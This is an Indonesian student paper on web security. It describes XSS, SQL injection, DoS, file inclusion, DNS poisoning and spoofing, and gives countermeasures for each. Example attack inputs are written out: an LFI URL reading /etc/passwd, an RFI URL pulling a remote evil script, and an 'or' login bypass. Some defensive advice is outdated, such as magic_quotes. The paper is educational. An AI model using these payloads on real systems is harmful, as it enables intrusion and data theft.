You are on page 1of 19

KEAMANAN KOMPUTER DAN JARINGAN

WEB SECURITY

Disusun untuk memenuhi tugas mata kuliah Keamanan Komputer dan Jaringan

Oleh

Kelompok 2 :

Desma Yulita 1501081002

Windi Sri Rahayu 1501081014

Rozalia 1501081024

Nurhasandi 1501081038

Wiki Harizal 1501081050

PROGRAM STUDI D3 TEKNIK KOMPUTER

JURUSAN TEKNOLOGI INFORMASI

POLITEKNIK NEGERI PADANG

2017
KATA PENGANTAR

Puji syukur kehadirat Tuhan Yang Maha Esa yang telah melimpahkan rahmat-Nya kepada
penulis sehingga penulis dapat menyelesaikan makalah ini untuk memenuhi tugas pada mata
kuliah Keamanan Komputer dan Jaringan.
Makalah ini membahas mengenai Keamanan Web. Keamanan web merupakan hal yang
penting ketika berbicara mengenai pembangunan sebuah website. Dengan fasilitas dan fungsional
lengkap yang ditawarkan sebah website maka akan percuma ketika web tersebut tidak memiliki
sistem keamanan. Oleh karena itu, pentingnya untuk kita mengetahui keamanan web tersebut.
Pada kesempatan ini penulis menyampaikan terima kasih khususnya kepada Bapak
Deni Satria, S.Kom.,M.Kom.,sebagai dosen mata kuliah Keamanan Komputer dan Jaringan yang
telah memberikan tugas ini sebagai langkah penanaman pemahaman untuk mahasiswa.
Dalam penyusunan makalah ini penulis menyadari masih banyak kekurangan, untuk itu
penulis menerima kritik dan saran yang sifatnya membangun sebagai bahan perbaikan dikemudian
hari. Semoga makalah ini dapat bermanfaat bagi semua pihak khusunya penulis dan umumnya
bagi para pembaca.

Padang, Juni 2017

Penulis

2
DAFTAR ISI

KATA PENGANTAR ...................................................................................................................2


DAFTAR ISI....................................................................................................................................3
BAB I PENDAHULUAN ................................................................................................................4
1.1. Latar Belakang ..............................................................................................................4
1.2. Rumusan Masalah .........................................................................................................4
1.3. Tujuan ...........................................................................................................................4
BAB II PEMBAHASAN .................................................................................................................5
2.1. Kasus Kegagalan Sistem ..............................................................................................5
2.2. Jenis Serangan Terhadap Web .....................................................................................5
2.3. Kelemahan Server ......................................................................................................11
2.4. Cara Mengatasi Serangan terhadap Web ...................................................................12
BAB III PENUTUP ......................................................................................................................18
3.1. Kesimpulan ................................................................................................................18

DAFTAR PUSTAKA ...................................................................................................................19

3
BAB I PENDAHULUAN

1.1. Latar Belakang


Dewasa ini perkembangan teknologi sudah sedemikian pesat. Tidak terkecuali pada
perkembangan teknologi website. Saat ini sudah banyak sekali aplikasi berbasis web yang dirilis
oleh para pengembang seperti aplikasi komunikasi dan informasi, chatting, resource sharing dan
File Transfer Protocol (FTP).
Banyaknya fasilitas dan fungsional yang ditawarkan oleh berbagai aplikasi web akan
semakin meyakinkan dengan adanya kemanan web pada setiap aplikasi web tersebut.

1.2. Rumusan Masalah


Untuk membatasi lingkup pembahasan maka masalah di rumuskan menjadi beberapa
bagian, sebagai berikut :
1. Contoh Kasus Kesalahan Sistem?
2. Apa saja contoh Serangan terhadap web ?
3. Sebab terjadinya serangan tersebut?
4. Cara mengatasi serangan tersebut?

1.3. Tujuan
Tujuan yang ingin dicapai dari makalah ini adalah :
1. Memenuhi tugas pada mata kuliah Keamanan Komputer dan Jaringan.
2. Mengetahui dan memahami jenis serangan terhadap web.
3. Mengetahui cara mengatasi serangan tersebut.
4. Mengetahui penyebab terjadinya serangan tersebut.

4
BAB II PEMBAHASAN

2.1 Kasus Kegagalan Sistem


1) Pembobolan jaringan NASA dari negara tirai bambu, hacker mendapatkan akses
lengkap yang memungkinkan untuk melakukan perubahan, menyalin data dan menghapus
dokumen penting. Hacker ini juga mampu menyembunyikan identitas untuk
menyembunyikan aksinya. (2011)
2) Anoymous jebol situs pemerintah AS, para peretas menyatakan perang terhadap
pemerintah Amerika Serikat akibat tewasnya Aaron Swartz karena bunuh diri disebabkan
pelecehan aktifis oleh pemerintah. Para peretas menyatakan perang dengan cara mengganti
halaman depan situs ussc.gov yang merupakan lembaga federal penegakan hukum dan
pengadilan federal. (2013)
3) Peretas Rusia curi Rp 89,3 Miliar, dengan modus menggandakan informasi rekening
nasabah dan menghabiskan batas penarikan harian sebelum mengambil uang dari ATM
bank diseluruh Eropa, Asia dan Amerika Serikat. (2011)

2.2 Jenis Serangan Terhadap Web


2.2.1 Cross-site Script
a. Pengertian
Cross-site script (XSS) adalah salah satu jenis serangan web dimana
penyerang berusaha untuk menyisipkan script yang berisikan kode jahat terhadap
suatu website untuk menjalankan suatu perintah, seperti menambahkan konten
JavaScript, ActiveX, Dlash pada request yang dapat membuat keluaran HTML
yang dapat dilihat oleh user lain. Serangan XSS ini merupakan salah satu yang
berbahaya dan paling banyak menyerang website manapun seperti Google dan
Facebook. XSS biasanya digunakan untuk mencuri cookie, pembajakan session,
menyebarkan malware dan pembelokan tujuan.
b. Contoh Sederhana
1) Terdapat sebuah textfield untuk mengisikan nama, jika user mengetikan sebuah
nama lalu meng-klik tombol kirim maka hasilnya akan seperti dibawah ini.

5
2) Namun textfield diatas belum memiliki sistem keamanan sehingga ketika user
mengetikan tag HTML dapat mengacaukan tampilan seperti dibawah ini.

2.2.2 SQL Injection


a. Pengertian
SQL injection adalah suatu metode yang digunakan untuk memanfaatkan
kelemahan pada mesin server SQL, misalnya server menjalankan layanan
SQL(MySQL, PostraseSQL, SQL server dan lain-lain). Kemudian cracker mencoba
memasukan suatu script untuk mencoba masuk kedalam sistem yang terproteksi tanpa
mengetahui username dan password. SQL injection juga merupakan jenis serangan
kejahatan terhadap suatu website karena memanfaatkan kelemahan yang dimiliki oleh
sistem untuk mengakses suatu konten dengan cara mengelabui sistem.
b. Penyebab Serangan Sql Injection
Tidak adanya penangan terhadap karakter-karakter tanda petik satu dan juga
karakter double minus yang menyebabkan suatu aplikasi dapat disisipi dengan perintah
SQL.
c. Contoh Sederhana
Contoh sintak SQL pada PHP :
1) $query = SELECT * FROM login WHERE username=$username AND
password=$password; . Dari GET atau POST variabel.
2) Isikan password dengan string or =
3) Hasilnya maka query akan seperti ini = SELECT * FROM login WHERE
username=$username AND password=pass or = ; . Dengan query ini hasil
selection akan selalu true.
4) Maka kita bisa inject syntax sql (or) kedalam SQL.

6
2.2.3 Denial-of-service Attack
a. Pengertian
Denial-of-service merupakan serangan yang dibuat oleh hacker yang
mengirimkan request dalam jumlah yang sangat besar dan dalam waktu yang
bersamaan. Dikarenakan permintaan-permintaan tersebut, server menjadi
kelebihan beban dan tidak bisa melayani user lainnya. Serangan DoS mampu
menghabiskan bandwidth yang ada pada server. Selain itu dapat juga
menghabiskan memory, koneksi database, dan sumber yang lain.
b. Contoh Kasus
Insiden yang menyerang DDOS juga terjadi pada pertengahan tahun 2009
dimana domain.co.id sempat drop selama 4 hari akibat serangan DDOS. Hal ini
menunjukkan adanya kelemahan yang sangat mendasar dalam sistem DNS CCTLD-
ID. Situasi ini sangat berbahaya mengingat domain.co.id merupakan salah satu
infrastruktur Internet Indonesia yang strategis. Kegagalan sistem DNS CCTLD-ID
berpotensi menimbulkan kerugian ekonomi. Karena domain drop otomatis para
pengguna tidak dapat mengakses situs dengan domain.co.id . bagi pengguna email di
yahoo.co.id. tidak dapat mengakses emailnya karena domainnya telah down.
Beberapa saat setelah kejadian tersebut administrator diberitakan melakukan
maintenance terhadap system keamanan domain tersebut dan sampai sekarang masih
dapat dinikmati oleh masyarakat.

7
2.2.4 Password Cracking Tools
a. Pengertian
Password cracking tools adalah alat bantu untuk menemukan atau membobol
kata kunci rahasia dari data yang telah disimpan atau dikirim oleh sistem komputer.
Tujuan dari password cracking adalah untuk membantu user memperoleh kembali
password yang lupa atau hilang, untuk mendapatkan sebuah hak akses kedalam
sebuah sistem atau bahkan sebagai cara untuk mengukur pencegahan oleh seorang
administrator sistem untuk mengecek password-password yang dapat di-crack
dengan mudah.
b. Contoh Password Cracking Tools
1) NIX Brute Force merupakan sebuah tools yang menggunakan teknik brute
force untuk masuk ke sebuah sistem tanpa otentikasi terlebih dahulu. Teknik
brute force ini akan dapat menebak dengan mudah atau bisa dengan cepat
menembus password yang lemah.
2) Hydra adalah tool untuk melakukan hacking password dengan menggunakan
metode dictionary attack seperti untuk hacking password access point,
password telnet dan lainnya.
3) Hashcat adalah sebuah tool untuk crack berbagai password yang di enkripsi,
sangat powerfull untuk recovery password.

2.2.5 File Inclusion


a. Pengertian
Remote file inclusion dapat diartikan sebagai penyisipan sebuah file
dari luar suatu file dalam sebuah webserver dengan tujuan script
didalam akan dieksekusi pada saat file yang disisipi di-load. Tehnik
ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan
server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat
menggunakan bahasa script tersebut. Target remote file inclusion
biasanya berbentuk sebuah portal atau content management system (CMS)
sehingga banyak sekali jumlah website yang rawan terhadap serangan
tipe ini.

8
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat
mengakses semua file di dalam server dengan hanya melalui URL.
b. Penyebab Terjadinya Inclusion
Sebuah serangan file inclusion terjadi didasarkan pada kesalahan atau
ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file.
Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara
benar dapat di eksploitasi.
c. Akibat file Inclusion
1. Web root folder / subdirectory defacing.
2. Previledge escalation (mendapatkan hak akses lebih tinggi).
3. Menjalankan proses dalam server (psyBNC, bots, dsb)
4. Pilfering ( pencurian data )
5. Pengambilalihan server
6. eksekusi perintah jarak jauh (Remote
Commands Execution) terhadap server.
d. Contoh kode Vulnerable
Contoh LFI :
http://www.situs.net/page.php?page=../../../../../etc/passwd
Contoh RFI :
http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt?

2.2.6 DNS Poisoning


DNS Poisoning merupakan sebuah cara untuk menembus pertahanan dengan cara
menyampaikan informasi IP Address yang salah mengenai sebuah host, dengan tujuan
untuk mengalihkan lalu lintas paket data dari tujuan yang sebenarnya. Cara ini banyak
dipakai untuk menyerang situs-situs e-commerce dan banking yang saat ini bisa dilakukan
dengan cara online dengan pengamanan Token. Teknik ini dapat membuat sebuah server
palsu tampil identik dengan dengan server online banking yang asli. Oleh karena itu
diperlukan digital cerficate untuk mengamankannya, agar server palsu tidak dapat
menangkap data otentifikasi dari nasabah yang mengaksesnya. Jadi dapat disimpulkan
cara kerja DNS (Domain Name System) poisoning ini adalah dengan mengacaukan DNS

9
Server asli agar pengguna Internet terkelabui untuk mengakses web site palsu yang dibuat
benar-benar menyerupai aslinya tersebut, agar data dapat masuk ke server palsu.

2.2.7 Spoofing
a. Pengertian
Spoofing adalah Teknik yang digunakan untuk memperoleh akses yang tidak
sah ke suatu komputer atau informasi, dimana penyerang berhubungan dengan
pengguna dengan berpura-pura memalsukan bahwa mereka adalah host yang dapat
dipercaya.
b. Contoh Web Spoofing
Web Spoofing melibatkan sebuah server web yang dimiliki penyerang yang
diletakkan pada internet antara pengguna dengan WWW, sehingga akses ke web yang
dituju pengguna akan melalui server penyerang. Cara seperti ini dikenal dengan
sebutan man in the middle attack. Hal ini dapat terjadi dengan beberapa jalan, tapi
yang paling mungkin adalah :
akses ke situs web diarahkan melalui sebuah proxy server : ini disebut (HTTP)
application proxy. Hal ini memberikan pengelolaan jaringan yang lebih baik untuk
akses ke server. Ini merupakan teknik yang cukup baik yang digunakan pada banyak
situs-situs di internet, akan tetapi teknik ini tidak mencegah Web Spoofing.
Seseorang menaruh link yang palsu (yang sudah di-hack) pada halaman web yang
populer.
Kita menggunakan search engine (mesin pencari, seperti Yahoo, Alta Vista, Goggle)
untuk mendapatkan link dari topik yang ingin dicari. Tanpa kita ketahui, beberapa
dari link ini telah diletakkan oleh hacker yang berpura-pura menjadi orang lain.
Seperti, pencarian untuk situs bank memberikan salah satu hasil
http://www.kilkbca.com, sayangnya kita mungkin tidak mengetahui bahwa URL
sebenarnya dari Bank BCA adalah http://www.klikbca.com
Kita menggunakan browser untuk mengakses sebuah Web. Semua yang ada
pada NET (baik Internet maupun Intranet) direferensikan dengan Universal Resource
Locator(URL).Pertama-tama penyerang harus menulis-ulang URL dari halaman web
yang dituju sehingga mereka mengacu ke server yang dimiliki penyerang daripada ke

10
server web yang sebenarnya. Misalnya, server penyerang terletak di
www.attacker.com, maka penyerang akan menulisulang URL dengan menambahkan
http://www.attacker.com didepan URL yang asli.

2.3 Kelemahan Server

Pada umumnya kelemahan server :

Biaya operasional relatif lebih mahal.(Domain dan sewa Server)


Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan
maka secara keseluruhan jaringan akan terganggu.
Membutuhkan software NOS yang mahal contoh : NT atau server Windows 2000,
XP,Novell, UNIX.
Membutuhkan hardware yang lebih tinggi dan mahal untuk mesin server.
Membutuhkan administrator yang professional.
Mempunyai satu titik lemah jika menggunakan satu server, data user menjadi tak ada jika
server mati.
Menggunakan web server(Apache Tomcat, Microsoft windows Server 2003 Internet
Information Services (IIS), Lighttpd, Sun Java System Web Server, Xitami Web Server
atau Zeus Web Server) yang sesuai.

11
2.4 Cara Mengatasi Serangan Terhadap Web
2.4.1 Mengatasi Serangan XSS
a. Solusi pencegahan untuk User
Untuk user solusi termudah adalah mematikan semua bahasa script yang
ada pada komputernya. Tentu saja hal ini juga menyebabkan beberapa
fungsionalitas pada site yang sedang dikunjungi menjadi tidak berjalan. Alternatif
lain adalah berhati-hati dalam mengunjungi suatu situs, terutama pada source URL
nya dan melakukan validasi data yang dimasukan oleh user request.

b. Solusi pencegahan untuk Developer atau suatu Organisasi

Sebab tidak ada dua aplikasi yang identik, pengembang aplikasi perlu
menyelaraskan antisipasi pengamanannya sebagaimana ditetapkan oleh kebutuhan bisnis.
Kunci dalam mencegah aplikasi yang rawan terhadap injeksi kode dan serangan tipikal
CSS ialah dengan memastikan bahwa halaman yang membangkitkan konten secara
dinamis tidak mengandung tag yang tidak diinginkan.

Sumber-sumber yang umumnya dijadikan titik masuk antara lain :

Query string
URLs dan bagian universal locator
Data yang dikirimkan
Cookies
Data persisten yang dipasok oleh user dan ditemu-kembali saat waktu setelahnya.

Solusi untuk pencegahan adanya serangan ini secara garis besar dapat disediakan
pada sisi klien dan pada sisi server.
Antipasi pada sisi Client,Solusi yang ditawarkan ialah:
Filtering
Menapis masukan dari klien browser dengan mewaspadai karakter-karakter
khusus.

12
Encoding
Melakukan pengkodean karakter yang dinilai membahayakan menjadi
karakter yang bisa diabaikan merupakan tujuan dari encoding. Dibandingkan
dengan filtering, encoding juga memiliki keuntungan, yaitu tidak
mengakibatkan hilangnya data.
Validasi
Teknik ini dilakukan untuk menjamin hanya input yang tepat yang akan
dipilih.
Sedangkan solusi yang diterapkan pada interaksi di sisi server :
Membatasi respon server
Membatasi jumlah personalised data yang dikirim ke browser klien
melalui penggunaan respon. Sebagai contoh, sebuah situs yang menampilkan
sapaan pada user saat pertama kali login sebagai response atas
http://trusted.org/greeting.jsp?name=User, demi pertimbangan keamanan,
perlu untuk mengorbankan respon dinamis seperti
http://trusted.org/greeting.jsp?name=User ke dalam bentuk hard code.
Membatasi panjang respon string
Pengembang seharusnya dapat membatasi panjang maksimum string yang
dipasok oleh user, walaupun awalnya dipaksakan di sisi klien, pasokan string
tersebut juga harus diperiksa di sisi server, dimana sangat memungkinkan
ditegakkannya batas maksimum panjang string yang dilewatkan pada satu
response.
HTTP referrer
Memanfaatkan standar HTTP dengan menggunakan bagian field header
referer, ketika klien browser mengikuti sebuah link atau mengirimkan data.
Isi referer harus berisi URL dari halaman asal data, ini memungkinkan aplikasi
web untuk memeriksa field referer dan menolak bila bukan berasal dari asal
host yang dibenarkan.

13
2.4.2 Mengatasi Serangan SQL Injection
Ada beberapa cara yang bisa kita lakukan untuk mengatasi serangan SQL injection
, kita bisa membuat script anti SQL injection dengan memanfaatkan fungsi bawan dari PHP
yaitu mysql_real_escape atau mysql_real_escape_string. cara penggunaanya adalah
sebagai berikut :
$id = mysql_real_escape_string($_GET['id']);
Selain cara di atas, ada beberapa tips aplikatif yang bisa anda gunakan untuk
mengamankan web anda dari serangan SQL injection, berikut ini tips nya :

1. Batasi panjang input box (jika memungkinkan), dengan


cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak
melihat input box nya gak bisa diinject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal
(Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang
berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored
Procedures jika memungkinkan.
5. Ubah Startup and run SQL Server menggunakan low privilege user di SQL Server
Security tab.

2.4.3 Mengatasi Serangan DOS

Bertahan dari serangan DDoS itu sendiri ada beberapa cara :

1. Mengaktifkan firewall pada komputer yang digunakan


2. Install IDS ( Intrusion Detection System )
3. Selalu tolak semua permintaan data pada UDP ( User Datagram Protocol)
situs anda
4. Gunakanlah Linux pada komputer yang digunakan
5. Hilangkan Semua Bug dan Celah yang terdapat di Situs Anda

14
6. Selalu Memperbaharui Sistem di Situs Anda
7. Selalu kontrol Setiap Ada IP Terbaru dan IP Yang mencurigakan
8. Membuat tim khusus untuk mencegah dan mengatasi DDOS pada jaringan

Ketika mendapat serangan salah satu cara yang dapat dilakukan dengan langkah
sebagai berikut :

1. Cari Ip ip yang melakukan serangan. Ciri cirinya adalah mempunyai


banyak koneksi, muncul banyak ip dari satu jaringan
2. Block ip tersebut sehingga tidak bisa melakukan serangan
3. Lakukan blocking terhadap IP yang mencurigakan, jika port anda telah
termasuki maka komputer anda akan di kuasai. Cara mengatasinya adalah
gunakan Firewall di kombinasikan dengan IDS
4. Menolak semua paket data dan mematikan service UDP. Selain itu gunakan
anti virus yang di mana dapat menangkal serangan data seperti Kapersky
5. Lakukan filtering pada permintaan ICMP ( Internet Control Message
Protocol ) echo pada firewall.

2.4.4 Mengatasi Serangan Password Cracking Tools


1. Limit Kesalahan Password
Cara yang mudah dapat mengatasi serangan Brute force, dengan cara
membatasi batasan kesalahan Password dalam 1 IP, cara ini sangatlah ampuh untuk
menangkal Brute Force di WordPress, Banyak plugin yang bisa diinstall untuk
mengatasi masalah ini
2. Pindahkan Halaman Login Anda
Memindahkan halaman login akan sangat membantu mencegah Brute force,
biasanya sebuah program brute force hanya akan menyasar wp-login.php atau wp-
admin.php, maka dari itu sangat disarankan untuk merubah Halaman login anda,
agar program brute force tidak bisa melakukan aksinya pada anda. Sudah banyak
plugin untuk mempermudah memindahkan URL halaman login.

15
3. Tambahkan Password untuk direktori Admin panel anda
Cara ini juga sangat ampuh mengatasi serangan Brute Force, jadi sebelum
terjadi serangan ke admin panel anda , maka program Brute force akan melewati
sebuah Pop up yang meminta memasukkan username dan password yang berbeda
dengan Username dan password WordPress anda, cara ini dapat mudah dilakukan
dengan menambahkan .htaccess dan .htpasswd di direktori wp-admin.
AuthUserFile .htpasswd
AuthName "Login Area"
AuthType "Basic"
require user NamaAnda
4. Mengaktifkan Cloudflare
Cloudflare adalah salah satu partner kita. Di cloudflare sudah ada fitur
caching dan security, sehingga dapat meminimalisir dampak yang diterima dari
aktifitas bruteforce tersebut. mengaktifkan cloudflare bisa dilakukan melalu cPanel
pada menu "Cloudflare"
5. Menambahkan Captcha
Captcha adalah kata ujian yang ditambahkan pada halaman login untuk memastikan
bahwa input login dilakukan oleh human (manusia) bukan oleh robot (mesin). Banyak
plugin yang bisa diinstall untuk menambahkan captcha pada halaman login wordpress

2.4.5 Mengatasi Serangan File Inclusion


1. Memvalidasi variable.
2. Mengkonfigurasi kembali settingan php pada server website Anda.
allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on
3. Pada include mungkin bisa ditambahkan ./
include(./$_GET[uploadfile]..php);
Maksudnya dengan seperti itu, saat kita mengakses file dari luar
server maka hasilnya akan error karena saat pemrosesan setiap file yang
masuk ke variable page akan ditambah ./ di depannya.

16
http://www.[target].com/index.php?uploadfile=http://www.
[remote].com/hacked.txt
Dengan seperti ini server atau website yang diinject akan mencari
file http://www.[remote].com/hacked.txt dan pastinya akan menyebabkan
server menampilkan error bahwa tidak ditemukannya file tersebut.

2.4.6 Mengatasi Serangan DNS Poisoning


1. Penggunaan versi Berkeley Internet Name Domain (BIND) terbaru.
2. Mengurangi kesalahan pada satu titik
3. Pembatasan zone-transfer
4. Membatasi dynamic update
5. Pembatasan query
6. Membatasi permintaan rekursif
7. Membagi fungsi dua name-server.
8. Menolak permintaan versi BIND
9. Mematikan layanan yang tidak perlu dan mem-filter lalu lintas data.
10. Memonitor server DNS dan berita keamanan BIND.
11. Menggunakan digital certificate.

2.4.7 Mengatasi Serangan Spoofing


1. Tidak mengaktifkan Javascript pada browser sehingga penyerang tidak dapat
menyembunyikan petunjuk atau bukti dari adanya penyerangan.
2. Memastikan bahwa location line dari browser selalu tampak.
3. Memperhatikan URL yang ditampilkan pada location line dari browser untuk
memastikan URL tersebut mengacu pada server dari situs sebenarnya yang
dikunjungi.

17
BAB III PENUTUP

3.1. Kesimpulan

Keamanan suatu website merupakan salah satu prioritas yang sangat utama untuk menjaga
keamanan suatu sistem agar tidak menjadi objek kejahatan para cracker.Jika pengembang
mengabaikan kemanan suatu website, maka seorang hacker dapat mengambil data-data penting
pada suatu website dan bahkan dapat pula mengacak-acak tampilan website tersebut.
Kejahatan-kejahatan para hacker dapat diredam dengan cara para pengembang mengatasi
keamanan websitenya masing-masing agar tidak mudah ditembus.

18
DAFTAR PUSTAKA

Metode Penyerangan Web Site Menggunakan Sql Injection. From:


http://p3m.amikom.ac.id/p3m/dasi/sept04/01%20%20STMIK%20AMIKOM%20Yogyakarta%2
0Makalah%20ANDI%20_metode%20penyerangan_%2010.pdf

Seminar Nasional Ilmu Komputer2014 (SNIKOM) .Laguboti, 20 - 24 Agustus 2014.


Deteksi, Identifikasi Dan Penanganan Web Menggunakan Sql Injection Dan Cross-Site
Scripting.From:http://s3.amazonaws.com/academia.edu.documents/35179284/ITDEL_SNIKOM
2014_PAPER_webvulnerability_v3.pdf?AWSAccessKeyId=AKIAIWOWYYGZ2Y53UL3A&E
xpires=1497071098&Signature=XvrJUvL0UHfCbF9Bv857l0%2F%2B4ts%3D&response-
contentdisposition=attachment%3B%20filename%3DDETEKSI_IDENTIFIKASI_DAN_PENA
NGANAN_WEB.pdf

Empat Jenis Serangan dan Cara Pencegahannya .From :


http://s3.amazonaws.com/academia.edu.documents/31394728/Empat_Jenis_Serangan_Web_dan
_Pencegahannya.pdf?AWSAccessKeyId=AKIAIWOWYYGZ2Y53UL3A&Expires=149700706
3&Signature=BkO%2F5nEpRgQYUIX9NM6c5HaI7bM%3D&response-content-
disposition=attachment%3B%20filename%3DEmpat_Jenis_Serangan_Web_dan_Pencegahann.p
df

Kominfo.2011. Panduan Keamanan Web Server. From :


http://dewi_anggraini.staff.gunadarma.ac.id/Downloads/files/45961/Keamanan+Pada+Web+Ser
ver.pdf

Informatika STEI ITB. Keamanan Web


Service.From:http://informatika.stei.itb.ac.id/~rinaldi.munir/Kriptografi/2005-
2006/Makalah/Makalah2005-24.pdf

19

You might also like